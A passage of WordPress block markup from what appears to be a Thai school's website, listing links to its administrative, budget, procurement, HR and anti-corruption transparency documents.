class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"9a3f4403\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"c36e8900\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" 